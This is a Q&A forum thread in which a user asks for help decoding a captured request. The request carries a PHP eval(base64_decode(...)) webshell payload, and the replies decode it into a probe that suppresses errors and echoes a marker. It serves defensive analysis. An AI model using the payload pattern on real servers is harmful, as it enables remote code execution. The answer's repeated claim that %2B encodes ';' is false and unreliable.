# Help with decoding this? Base64 attack

Tags: encoding, obfuscation

I'm trying to decode this attack. I know it's attempting to send some kind of malicious command to the web server but I can't figure out how to decode it. It's like encoded more than once or something. I don't know. I've looked around and can't find it.

a=@ eval (base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztwcmludCgiaGFvcmVuZ2UuY29tUVEzMTcyNzU3MzgiKTs7ZWNobygifDwtIik7ZGllKCk7

Comment: Did you try Base64-decoding the z0 parameter? Hint: you just copied a piece of the request body there, so you'd need to URL-decode (`unescape` in JS-speak) it first.

Comment: It's a basic webshell. The important part is that it directly evaluates user data.

Answer (score 1, accepted):

You need to url decode it first. There is a character in the middle `%2B` that is a `;`.

Check [this](https://gchq.github.io/CyberChef/#recipe=URL_Decode()From_Base64('A-Za-z0-9%2B/%3D',true)&input=UUdsdWFWOXpaWFFvSW1ScGMzQnNZWGxmWlhKeWIzSnpJaXdpTUNJcE8wQnpaWFJmZEdsdFpWOXNhVzFwZENnd0tUdEFjMlYwWDIxaFoybGpYM0YxYjNSbGMxOXlkVzUwYVcxbEtEQXBPMlZqYUc4b0lpMCUyQmZDSXBPenR3Y21sdWRDZ2lhR0Z2Y21WdVoyVXVZMjl0VVZFek1UY3lOelUzTXpnaUtUczdaV05vYnlnaWZEd3RJaWs3WkdsbEtDazc) out.

```
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztwcmludCgiaGFvcmVuZ2UuY29tUVEzMTcyNzU3MzgiKTs7ZWNobygifDwtIik7ZGllKCk7
```

turns into

```
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;print("haorenge.comQQ317275738");;echo("|<-");die();
```

Comment: Thanks a lot. So the %2B, anytime I see that in base64, I should URL decode it?

Comment: Well base64 chars are alphanumeric plus `+` and `/`. In addition `=` are used for padding. So if you see any characters other than that in the string, you know it's not base64.  I saw the `%2B` and knew that was a URL encoding of `;`, so I just substituted it for the `;` and gave it a try in base64. And it worked! A lot of this is just guess and check :)